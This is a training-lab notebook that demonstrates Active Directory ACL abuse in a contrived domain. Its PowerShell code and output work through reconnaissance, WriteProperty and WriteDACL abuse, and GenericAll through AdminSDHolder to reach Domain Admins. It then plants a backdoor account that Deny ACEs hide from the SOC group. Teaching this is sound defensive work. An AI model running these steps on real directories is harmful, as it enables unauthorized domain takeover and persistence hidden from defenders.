# ACL Overview
In the Windows operating system, everything is an object - that is, everything is represented by data structures in memory, that contain members that describe the nature of the data the structure is meant to represent. Obvious things such as files and registry keys are objects, but also more abstract things such as processes and threads are also objects.

Active Directory is no different - AD is primarily a database of objects that represent the various identities and relationships in a Windows network. Each object in an AD environment is a user, a group, a computer, a printer, a service account, or even a container for any of these.

Again, as in the Windows operating system, Active Directory objects themselves control who has access to them via _Access Control Lists_, or ACLs (specifically the **D**iscretionary **A**ccess **C**ontrol List or DACL), with each Access Control Entry (or ACE) in the ACL specifying an identity and the specific access rights that identity can excise on the object.

Access rights are incredibly powerful - the demonstration below is not exhaustive, but it will be become apparent how destructive a misconfiured ACE on the wrong object can be. Notably however, many of the attacks that are enabled by misconfigured access rights are detailed in their own notebooks, making understanding what objects have rights over other objects one of the fundamental tasks in reconaissance, and in understanding numerous other attack paths through an AD environment.  

This lab however will focus on an attack path that relies entirely on misconfigured ACLs. While this is a contrived example, it will demonstrate how these attacks paths work, and lay important foundations for other labs. If you skip any lab, do not skip this one.

For this lab, we will assume we have access to the account of a user called "John Dee" by some initial access technique.

In [4]:
function Search-Directory {
    param (
        [String]$filter,
        [Switch]$all
    )

    # we are hardcoding a lot of stuff here including creds, which is... bad
    $dirEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://dc01.aclabuse.lab", "aclabuse.lab\john.dee", "johnsPass01")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($dirEntry)
    $searcher.Filter = $filter

    # SACL part of security descriptor can only be read by a domain admin, so explicitly request the DACL only
    $searcher.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl

    try {
        if($all) {
            $results = $searcher.FindAll()
            $results | Foreach-Object { $_ }
            $results.Dispose()
        } else {
            $searcher.FindOne()
        }
    } finally {
        $dirEntry.Dispose()
    }
}

(Search-Directory -Filter "(ObjectCategory=*)").Properties['DistinguishedName']

DC=aclabuse,DC=lab


Looks like the creds work. 

While this notebook seeks to explain ACL attacks and misuses, some discussion of the code is neccessary. The attack path presented here works by making LDAP calls to the directory service in order to both query the directory and request modifications to data in the directory. We are using the [ADSI interface](https://learn.microsoft.com/en-us/windows/win32/adsi/using-adsi) for these calls.

The above function works briefly like this: the .NET type `DirectoryEntry` when constructed binds to an entry in the directory, as the name suggests. The `DirectoryEntry` object being constructed above is binding to the _RootDSE_, which is the Root object of the entire directory. The RootDSE sits on a directory server, so we supply it wih the FQDN of the domain controller (the directory server for this lab). The `DirecotryEntry` object is also constructed [using parameters for an authenticated bind](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.directoryentry.-ctor?view=net-8.0#system-directoryservices-directoryentry-ctor(system-string-system-string-system-string-system-directoryservices-authenticationtypes)), using the credentials of the account we have compromised.

We then construct a `DirectorySearcher` object - think of it as a pointer or cursor which we use to traverse the directory and look for objects. We need to add a mask for certain propertes - while the DACL is viewable by all users who can view an object, the SACL is only viewable by domain admins. We add a mask to only return the DACL portion of the object security descriptor, otherwise the security descriptor would be blank (with no DACL either). Finally, we apply an [LDAP filter to the DirectorySearcher]() and either return a single result, or all possible results.

Lets examine the account we have creds for in more detail. As you can see below, looks like John is in the group __Office Admins__. Maybe an HR function of some kind? 

In [5]:
$userSearchResult = Search-Directory -Filter "(&(objectCategory=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


Lets examine the properties of the Office Admins group briefly. We set the filter to look for the Office Admins group, retrieve a `SearchResult` object and print the properties of the object, which will have been filled with the properties of the AD object we searched for. The distinction between the `SearchResult` object returned by the `Search-Directory` function and the `DirectoryEntry` object is an important one; one is used to examine search results, while the other is nessecary for modifying data in the directory.

In [14]:
$officeAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Office Admins))"
"Object Type: $($officeAdminsSearchResult.GetType().Name)"
"`n=== Object Properties ==="
"CN: $($officeAdminsSearchResult.Properties.cn)"
"DN: $($officeAdminsSearchResult.Properties.distinguishedname)"
"Members: $($officeAdminsSearchResult.Properties.member)"
"SID: $($officeAdminsSearchResult.Properties.objectsid)"

Object Type: SearchResult

=== Object Properties ===
CN: Office Admins
DN: CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Members: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
SID: 1 5 0 0 0 0 0 5 21 0 0 0 161 186 167 27 246 80 60 61 8 20 127 79 82 4 0 0


We can see the members only include the compromisd account, John Dee (this is a contrived lab after all). Notice that the SID of the group is in a binary format however. We need the SID for the next step, so we will construct a `SecurityIdentifier` object out of this binary value, in order to convert it to the more recognisable form.

In [15]:
$officeAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$officeAdminsSearchResult.Properties.objectsid[0],0))
$officeAdminsSID.Value

S-1-5-21-463977121-1027363062-1333728264-1106


Now for some actual recon. Lets look at what other groups the Office Admins group has rights to. As before we set the LDAP filter, this time to look for any groups with _admin_ in the name. Then, we iterate through the groups, examining the ACLs for the group as we go and highlighting any ACEs that contain the SID of the Office Admins group. This will give us a list of objects in the domain that members of the Office Admins group have rights to. 

We will do this multiple times in the lab, so we will wrap this code into a convenience function. If we wanted to scale this or use it outside this lab we would need to refactor it considerably, but it works well enough for this demonstration.

In [16]:
function scout-adminACL {
    param (
        [String]$targetSID
    )

    Write-Host "Checking which admin groups $targetSID has rights on...`n"

    # Search for groups with "admin" in the common name
    $groups = $(Search-Directory -Filter "(&(objectCategory=group)(cn=*admin*))" -All) 
    foreach ($group in $groups) {
        
        # Get the common name of the group
        $groupName = $group.Properties["cn"][0]

        # Get the ACL from the binary nTSecurityDescriptor property
        $groupSecurityDescriptor = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $groupSecurityDescriptor.SetSecurityDescriptorBinaryForm([Byte[]]$group.Properties["nTSecurityDescriptor"][0])
        $groupACL = $groupSecurityDescriptor.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        
        # Iterate through the ACLs of each group, looking for the targetSID
        foreach ($ace in $groupACL) {
            if ($ace.IdentityReference.CompareTo($targetSID) -eq 0) {
                Write-Host "$($ace.AccessControlType) -> $($ace.ActiveDirectoryRights) on '$groupName'"
            }
        }
    }
}

scout-adminACL -targetSID $officeAdminsSID.Value


Checking which admin groups S-1-5-21-463977121-1027363062-1333728264-1106 has rights on...

Allow -> WriteProperty on 'DevOps Admins'


Bingo. But what can we do with this right?

## WriteProperty
This right, as the name implies, grants a principal the capability to modify properties on another object. If we had `WriteProperty` on the _Domain Admins_ group, for example, we could simply modify the _members_ property and add ourselves to that group. Not so lucky this time, but we do have this right over the _DevOps Admins_ group. We will use this to add our compromised user to the _DevOps Admins_ group.

Using the `AdPath` of the group object, we re-bind to the directory at the point of the group object entry itself - we will need the `DirectoryEntry` of the group to actually make changes to the object as it exists in the directory.

Once we have the directory entry, we call the `.Add()` method to add our compromised user to the group - this method automatically commits this change back to the directory.

In [20]:
$devOpsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"

"Group Name: $($devopsAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($devopsAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $AdPath = $devopsAdminsSearchResult.Path
    $devOpsAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($AdPath, "aclabuse.lab\john.dee", "johnsPass01")
    $devopsAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
} finally {
    $devopsAdminsEntry.Dispose()
}

$devOpsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"
"`nNew Members:"
foreach ($member in $($devopsAdminsSearchResult.Properties.member)) {
    "    $member"
}

Group Name: DevOps Admins
Original Members:
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
MethodInvocationException: 
Line |
  12 |      $devopsAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC= …
     |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"

New Members:
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab


Error: Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"

Examining the compromised account once more we can see the `MemberOf` property has been updated and reflects the new group membership.

In [18]:
$userSearchResult = Search-Directory -Filter "(&(objectClass=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=DevOps Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


### Tidying Up
You will notice in the above code and in nearly all other code cells in this lab that there are calls to the `.Dipose()` method after nearly all operations involving construction of a `DirectoryEntry`. This is because ADSI caches connections unless they are explicitly broken by disposing of the resources it uses, and a `DirectoryEntry` is a direct bind and therefore connection to an object in a directory service.

The reasona to explicitly break this connection are twofold; for one, we use the DirectoryEntry constructor to create an _authenticated_ bind using our stolen creds, so that we can begin searching the directory as a normal user rather than an anonymous user. This means any time we want to re-authenticate we need to dispose this initial bind. The second reason, is that after we have achieved privileged esclataion, such as adding our compromised user to select privileged groups, we need to re-authenticate so that our access token associated with the ADSI bind is reconstructed with the newly added privileges. If we did not explicitly break the bind with `.Dispose()`, the connection would persist (you can check this by removing the `.Dipose()` and examing the network traffic) and we would continue to use the older access token which lacks the newly added privileged groups, and subsequent attempts to escalate privileges would fail. There is a potential opsec consideration here - as these repeated authentication attempts will possibly appear abnormal when compared to normal user behaviour. Again, **this notebook is meant to be illustrative not prescriptive** - it is written to demonstrate what _can_ be done, not what _should_ be done. 

## WriteDACL
Hunting forward we can see that the DevOps Admins group has the right WriteDACL on the IT Admins group. This right is self descriptive - it allows for a principal to modify the DACL of another object.

In [19]:
$devopsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"
$devopsAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$devopsAdminsSearchResult.Properties.objectsid[0],0))
scout-adminACL -targetSID $devopsAdminsSID.value

Checking which admin groups S-1-5-21-463977121-1027363062-1333728264-1108 has rights on...

Allow -> ReadControl, WriteDacl on 'IT Admins'


Lets use the WriteDACL to add an entry to the DACL on the IT Admins group object, which lets us modify that group. We could add WriteProperty and use this as before to modify group membership, but lets try a more permissive right: GenericWrite.

We will first construct an ACE using our compromised users SID, the AD right we want (GenericWrite), the control type of _allow_, and with inheritence disabled. 

In [23]:
$userSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$userSearchResult.Properties.objectsid[0],0))
$newAce = (New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
                ([System.Security.Principal.IdentityReference]([System.Security.Principal.SecurityIdentifier]$userSID)), 
                ([System.DirectoryServices.ActiveDirectoryRights]'GenericWrite'),
                ([System.Security.AccessControl.AccessControlType]'Allow'),
                ([System.DirectoryServices.ActiveDirectorySecurityInheritance]'None'))
            )
$newAce | Select *


ActiveDirectoryRights : GenericWrite
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : S-1-5-21-463977121-1027363062-1333728264-1104
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None



Inheritence can be a useful primitive in ACL attacks, as having control over a parent object and being able to apply an inheritable ACE to that parent implies control over its children.

The code below that we use to apply this ACE to the DACL of the IT Admins group is similar to the code that we use to add a principal to the members property, however whereas when adding a principal to the group used the `Add()` method here we explicitly commit changes by calling (you guessed it) `.CommitChanges()`. The only other thing to note is we are still masking the security descriptor to only retrieve or affect the DACL portion - we are still not privileged enough to touch the SACL.

In [24]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"

try {
    $AdPath = "LDAP://dc01.aclabuse.lab/$($ITAdminsSearchResult.Properties.distinguishedname)"
    $ITAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($AdPath, "aclabuse.lab\john.dee", "johnsPass01")
    $ITAdminsEntry.psbase.Options.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
    $ITAdminsEntry.psbase.ObjectSecurity.AddAccessRule($newAce)
    $ITAdminsEntry.psbase.CommitChanges()
} finally {
    $ITAdminsEntry.Dispose()
}

If the above code runs succesfully it will generate no output, so lets check the ACE of the IT Admins group to ensure our ACE has been added.

In [25]:
$ITAdminsPath = (Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))").Path

try {
    $ITAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry(
                        $ITAdminsPath, 
                        "aclabuse.lab\john.dee", 
                        "johnsPass01"
                    )

    ForEach ($ACE in $ITAdminsEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ACE.IdentityReference.CompareTo($userSID) -eq 0) {
            $ACE
        }
    }
} finally {
    $ITAdminsEntry.Dispose()
}


ActiveDirectoryRights : GenericWrite
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : S-1-5-21-463977121-1027363062-1333728264-1104
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None



## GenericWrite

The GenericWrite right allows for a great deal of control over an object, and is the equivilent to having both WriteProperty and WritePropetyExtended set with ObjectType GUID set to 0 (meaning, all properties or extended properties). For simplicity sake however, we will leverage it to just add our compromised user to the IT Admins group.

Below is the same group modification pattern as you have seen before that will add our compromised user to this group.

In [26]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"

"Group Name: $($ITAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($ITAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $AdPath = $ITAdminsSearchResult.Path
    $ITAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($AdPath, "aclabuse.lab\john.dee", "johnsPass01")
    $ITAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
    $ITAdminsEntry.RefreshCache()
} finally {
    $ITAdminsEntry.Dispose()
}

$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"
"`nCurrent Members:"
foreach ($member in $($ITAdminsSearchResult.Properties.member)){
    "    $member"
}

Group Name: IT Admins
Original Members:

Current Members:
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab


And as before this should be reflected in the users directory entry.

In [27]:
$userSearchResult = Search-Directory -Filter "(&(objectClass=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=DevOps Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=IT Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


Lets examine what rights the IT Admins group has and on what objects in the domain.

In [30]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"
$ITAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$ITAdminsSearchResult.Properties.objectsid[0],0))
scout-adminACL -targetSID $ITAdminsSID.value

Checking which admin groups S-1-5-21-463977121-1027363062-1333728264-1107 has rights on...

Allow -> GenericAll on 'Administrators'
Allow -> GenericAll on 'Schema Admins'
Allow -> GenericAll on 'Enterprise Admins'
Allow -> GenericAll on 'Domain Admins'
Allow -> GenericAll on 'Key Admins'
Allow -> GenericAll on 'Enterprise Key Admins'


Blimey. Thats bad. Looks like IT Admins has permissions on all privileged groups. So what is granting these rights?

## GenericAll and AdminSDHolder
GenericAll means just that - any and all actions are permitted on the target object for the principle granted the right. How this right was applied to so many privileged groups is down to a template object known as AdminSDHolder.

AdminSDHolder is an object that holds the DACL for all privileged objects in the domain. Every 60 minutes or so, a process called SDProp will run and apply whatever DACL is on AdminSDHolder to the privileged groups, overwriting any other DACL that those objects may have. This is a security control, as any misconfigurations to the DACL of these privileged groups could lead to compromise as we have already seen. This is unfortunately a double edged sword, and if permissions on the AdminSDHolder object are not careful controlled then it instead becomes a pathway for an attacker.

As we can see below the IT Admins group was at some point granted GenericAll on the AdminSDHolder object, and has retained this right - meaning it has propagated out to all the privileged groups in the domain.

Examinging the ACL of the AdminSDHolder object confirms this - it contains an ACE with the SID of the IT Admins group and with GenericAll allowed.

In [31]:
$AdminSDPath = (Search-Directory -Filter  "(cn=AdminSDHolder)").Path

try {
    $adminSDEntry = New-Object System.DirectoryServices.DirectoryEntry(
                        $AdminSDPath, 
                        "aclabuse.lab\john.dee", 
                        "johnsPass01"
                    )

    ForEach ($ACE in $adminSDEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ACE.IdentityReference.CompareTo($ITAdminsSID) -eq 0) {
            $ACE
        }
    }
} finally {
    $adminSDEntry.Dispose()
}


ActiveDirectoryRights : GenericAll
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : S-1-5-21-463977121-1027363062-1333728264-1107
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None



GenericAll gives us free reign over the objects it is applied to, so its a simple matter now of adding our compromised account to the domain admins group and establishing domain dominance.

In [32]:
$domainAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Domain Admins))"
"Group Name: $($domainAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($domainAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $path = $domainAdminsSearchResult.Path
    $domainAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($path, "aclabuse.lab\john.dee", "johnsPass01")
    $domainAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
    $domainAdminsEntry.RefreshCache()
} finally {
    $domainAdminsEntry.Dispose()
}

$domainAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Domain Admins))"
"`nCurrent Members:"
foreach ($member in $($domainAdminsSearchResult.Properties.member)){
    "    $member"
}

Group Name: Domain Admins
Original Members:
    CN=SOC,CN=Users,DC=aclabuse,DC=lab
    CN=aclAdmin,CN=Users,DC=aclabuse,DC=lab
    CN=Administrator,CN=Users,DC=aclabuse,DC=lab

Current Members:
    CN=SOC,CN=Users,DC=aclabuse,DC=lab
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=aclAdmin,CN=Users,DC=aclabuse,DC=lab
    CN=Administrator,CN=Users,DC=aclabuse,DC=lab


Lets test this by doing something only admins should be able to do; remotely access a DC via PowerShell and start running abitrary commands. The `whoami.exe` command shows the crazy amount of privilege we have acquired in a short space of time.

In [34]:
$credential = New-Object PSCredential("aclabuse\john.dee", $(ConvertTo-SecureString "johnsPass01" -AsPlainText -Force))

Invoke-Command -ComputerName "dc01.aclabuse.lab" -Credential $credential -ScriptBlock {
    whoami.exe /user /groups
}



USER INFORMATION
----------------

User Name         SID                                          
================= =============================================
aclabuse\john.dee S-1-5-21-463977121-1027363062-1333728264-1104


GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes                                                     
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatib

## Persistence
Now a member of the Domain Admins group, we can try to maintain some sort of domain persistence, should the John.Dee account get noticed as behaving suspciously (which given what we have done with it, is more or less a given at this point). 

We will create a backdoor account, and set several DENY ACEs on the account in order to blind the SOC to its existence.

First we create a container for the account, and explicitly deny the SOC group the ListChildren right on it, then create a hilariously titled account named "Admin Backdoor", and explicit deny the SOC group the ListObject right on it.

In [35]:
Invoke-Command -ComputerName "dc01.aclabuse.lab" -Credential $credential -ScriptBlock {
    New-ADObject -name "TotallyNotABackDoor" -Type "Container"
    
    $containerPath = (Get-ADObject -Filter {Name -eq 'TotallyNotABackDoor'}).DistinguishedName

    $targetDN = "AD:$containerPath"
    $targetACL = Get-ACL -Path $targetDN
    $groupSID = (Get-ADGroup -Identity 'SOC').SID
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $groupSID,
        [System.DirectoryServices.ActiveDirectoryRights]::ListChildren,
        [System.Security.AccessControl.AccessControlType]::Deny
    )
    $targetACL.SetAccessRule($ace)
    Set-Acl -AclObject $targetACL -Path $targetDN
    
    New-ADUser -Name 'Admin Backdoor' `
        -GivenName 'Ad' -Surname 'Min' `
        -SamAccountName 'admin.backdoor' `
        -UserPrincipalName ('admin.backdoor@' + $domainName) `
        -AccountPassword (ConvertTo-SecureString 'backdoorPass01' -AsPlainText -Force) `
        -Path $containerPath -PassThru | Enable-ADAccount

    $targetDN =  "AD:$(Get-ADUser -Identity 'admin.backdoor')"
    $targetACL = Get-ACL -Path $targetDN
    $groupSID = (Get-ADGroup -Identity 'SOC').SID
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $groupSID,
        [System.DirectoryServices.ActiveDirectoryRights]::ListObject,
        [System.Security.AccessControl.AccessControlType]::Deny
    )
    $targetACL.SetAccessRule($ace)
    Set-Acl -AclObject $targetACL -Path $targetDN
}

Examining the list of AD users via our compromised account, we can see our newly added Admin Backdoor account.

In [ ]:
$credential = New-Object PSCredential("aclabuse.lab\john.dee", $(ConvertTo-SecureString "johnsPass01" -AsPlainText -Force))
Invoke-Command -ComputerName "dc01.aclabuse.lab" -Credential $credential -ScriptBlock {
    Get-ADUser -Filter * | select Name
}


Name           PSComputerName    RunspaceId
----           --------------    ----------
Administrator  dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
Guest          dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
aclAdmin       dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
krbtgt         dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
John Dee       dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
Jane Doe       dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44
Admin Backdoor dc01.aclabuse.lab e3b15659-9cce-49b4-a857-fa97c0d26c44



Compare this to the output when a member of the SOC group examines the list of user accounts...

In [43]:
$credential = New-Object PSCredential("aclabuse.lab\jane.doe", $(ConvertTo-SecureString "janesPass01" -AsPlainText -Force))
Invoke-Command -ComputerName "dc01.aclabuse.lab" -Credential $credential -ScriptBlock {
    Get-ADUser -Filter * | select Name
}


Name          PSComputerName    RunspaceId
----          --------------    ----------
Administrator dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764
Guest         dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764
aclAdmin      dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764
krbtgt        dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764
John Dee      dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764
Jane Doe      dc01.aclabuse.lab 5660f315-a112-46e6-8e32-9a8ea6af5764



Once again, this is meant to be merely illustrative - this is **not** an opsec safe way of creating an invisible backdoor, but hopefully serves to demonstrate more of the capabilities of these kinds of attack primitives.

## Last Words
Although a lot of manual recon was performed in this notebook, the entire attack path is viewable, in a much more digestible format, via bloodhound:

![aclabuse_attack_path](./Images/aclabuse.png) 

Interestingly, in its earlier versions bloodhound internally used the ADSI pattern used in this notebook; [it has since switched to a different method](https://blog.cptjesus.com/posts/sharphoundtechnical/#pure-ldap). 

# Further Reading
[An Ace Up the Sleeve: Designing Active Directory DACL Backdoors](https://specterops.io/wp-content/uploads/sites/3/2022/06/an_ace_up_the_sleeve.pdf)

https://learn.microsoft.com/en-us/windows/win32/ad/security-contexts-and-active-directory-domain-services

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/4a7705f7-c61e-4020-86a7-41a44fb233e5